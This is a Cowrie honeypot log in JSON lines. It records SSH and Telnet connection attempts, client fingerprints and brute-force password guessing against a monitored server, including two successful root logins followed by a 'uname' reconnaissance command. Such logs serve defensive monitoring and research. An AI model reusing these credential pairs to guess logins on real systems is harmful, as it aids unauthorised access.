{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:14:57.916702Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:14:58.515224Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:14:58.515910Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:58.686780Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:14:58.690805Z","src_ip":"194.233.79.134","session":"96ee5b588609"}
{"eventid":"cowrie.session.closed","duration":30.380818843841553,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:15:02.207078Z","src_ip":"212.227.125.160","session":"2fc796096712"}
{"eventid":"cowrie.session.connect","src_ip":"221.151.152.15","src_port":53845,"dst_ip":"1.2.3.4","dst_port":23,"session":"a00d6c509283","protocol":"telnet","message":"New connection: 221.151.152.15:53845 (1.2.3.4:23) [session: a00d6c509283]","sensor":"my-vps","timestamp":"2025-08-28T02:15:33.512968Z"}
{"eventid":"cowrie.session.closed","duration":13.135290384292603,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:15:46.648190Z","src_ip":"221.151.152.15","session":"a00d6c509283"}
{"eventid":"cowrie.session.closed","duration":"301.5","message":"Connection lost after 301.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:15:47.742174Z","src_ip":"212.227.235.229","session":"854b65774cb0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":54922,"dst_ip":"1.2.3.4","dst_port":22,"session":"0754e395bbf6","protocol":"ssh","message":"New connection: 77.83.240.46:54922 (1.2.3.4:22) [session: 0754e395bbf6]","sensor":"my-vps","timestamp":"2025-08-28T02:15:58.015682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:15:58.018480Z","src_ip":"77.83.240.46","session":"0754e395bbf6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T02:15:58.061418Z","src_ip":"77.83.240.46","session":"0754e395bbf6"}
{"eventid":"cowrie.login.failed","username":"gns3","password":"gns3","message":"login attempt [gns3/gns3] failed","sensor":"my-vps","timestamp":"2025-08-28T02:15:58.104777Z","src_ip":"77.83.240.46","session":"0754e395bbf6"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:15:59.119950Z","src_ip":"77.83.240.46","session":"0754e395bbf6"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":33713,"dst_ip":"1.2.3.4","dst_port":22,"session":"e333215a5b88","protocol":"ssh","message":"New connection: 80.94.95.15:33713 (1.2.3.4:22) [session: e333215a5b88]","sensor":"my-vps","timestamp":"2025-08-28T02:16:17.930707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:16:17.931437Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:16:18.015903Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456qwerty","message":"login attempt [user/123456qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:18.455736Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.login.failed","username":"user","password":"tobias","message":"login attempt [user/tobias] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:19.551847Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.login.failed","username":"user","password":"tatyana","message":"login attempt [user/tatyana] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:20.648230Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.login.failed","username":"user","password":"stuff","message":"login attempt [user/stuff] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:21.743219Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.login.failed","username":"user","password":"spectrum","message":"login attempt [user/spectrum] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:22.841218Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:16:23.936568Z","src_ip":"80.94.95.15","session":"e333215a5b88"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":46044,"dst_ip":"1.2.3.4","dst_port":22,"session":"2821621d26d7","protocol":"ssh","message":"New connection: 194.233.79.134:46044 (1.2.3.4:22) [session: 2821621d26d7]","sensor":"my-vps","timestamp":"2025-08-28T02:16:24.535852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:16:25.306638Z","src_ip":"194.233.79.134","session":"2821621d26d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:16:25.307867Z","src_ip":"194.233.79.134","session":"2821621d26d7"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-28T02:16:28.290487Z","src_ip":"194.233.79.134","session":"2821621d26d7"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:16:29.570914Z","src_ip":"194.233.79.134","session":"2821621d26d7"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":57462,"dst_ip":"1.2.3.4","dst_port":22,"session":"3acb024b3f08","protocol":"ssh","message":"New connection: 194.233.79.134:57462 (1.2.3.4:22) [session: 3acb024b3f08]","sensor":"my-vps","timestamp":"2025-08-28T02:18:01.182434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:18:01.226839Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:18:01.605264Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:18:02.656594Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:18:03.846706Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:18:03.847359Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:18:04.383753Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:18:04.385014Z","src_ip":"194.233.79.134","session":"3acb024b3f08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21080,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fa5e1fdb260","protocol":"ssh","message":"New connection: 212.227.235.229:21080 (1.2.3.4:22) [session: 9fa5e1fdb260]","sensor":"my-vps","timestamp":"2025-08-28T02:18:46.459671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:18:46.460645Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:18:46.565297Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chowder","message":"login attempt [admin/chowder] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:47.063006Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"admin","password":"choppers","message":"login attempt [admin/choppers] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:48.170072Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chango","message":"login attempt [admin/chango] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:49.276417Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62426,"dst_ip":"1.2.3.4","dst_port":22,"session":"7eb886d4d357","protocol":"ssh","message":"New connection: 212.227.235.229:62426 (1.2.3.4:22) [session: 7eb886d4d357]","sensor":"my-vps","timestamp":"2025-08-28T02:18:49.498420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:18:49.499672Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:18:49.639112Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.login.failed","username":"service","password":"service","message":"login attempt [service/service] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:50.253977Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.login.failed","username":"admin","password":"catalog","message":"login attempt [admin/catalog] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:50.382185Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc123","message":"login attempt [service/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:51.381008Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cannonda","message":"login attempt [admin/cannonda] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:51.487729Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd123","message":"login attempt [service/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:52.527728Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:18:52.593110Z","src_ip":"212.227.235.229","session":"9fa5e1fdb260"}
{"eventid":"cowrie.login.failed","username":"service","password":"abcd1234","message":"login attempt [service/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:53.655374Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.login.failed","username":"service","password":"abc1234","message":"login attempt [service/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T02:18:54.783546Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:18:55.911858Z","src_ip":"212.227.235.229","session":"7eb886d4d357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37234,"dst_ip":"1.2.3.4","dst_port":22,"session":"eef2e40ddf0f","protocol":"ssh","message":"New connection: 212.227.125.160:37234 (1.2.3.4:22) [session: eef2e40ddf0f]","sensor":"my-vps","timestamp":"2025-08-28T02:19:07.454581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:19:07.455551Z","src_ip":"212.227.125.160","session":"eef2e40ddf0f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T02:19:07.712637Z","src_ip":"212.227.125.160","session":"eef2e40ddf0f"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:19:17.455260Z","src_ip":"212.227.125.160","session":"eef2e40ddf0f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50116,"dst_ip":"1.2.3.4","dst_port":22,"session":"7018082bdc13","protocol":"ssh","message":"New connection: 194.233.79.134:50116 (1.2.3.4:22) [session: 7018082bdc13]","sensor":"my-vps","timestamp":"2025-08-28T02:19:41.440356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:19:41.471751Z","src_ip":"194.233.79.134","session":"7018082bdc13"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:19:41.731316Z","src_ip":"194.233.79.134","session":"7018082bdc13"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"123456","message":"login attempt [ftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:19:43.086785Z","src_ip":"194.233.79.134","session":"7018082bdc13"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:19:44.419560Z","src_ip":"194.233.79.134","session":"7018082bdc13"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65252,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1866e47ec9e","protocol":"ssh","message":"New connection: 217.72.205.35:65252 (1.2.3.4:22) [session: b1866e47ec9e]","sensor":"my-vps","timestamp":"2025-08-28T02:20:13.252138Z"}
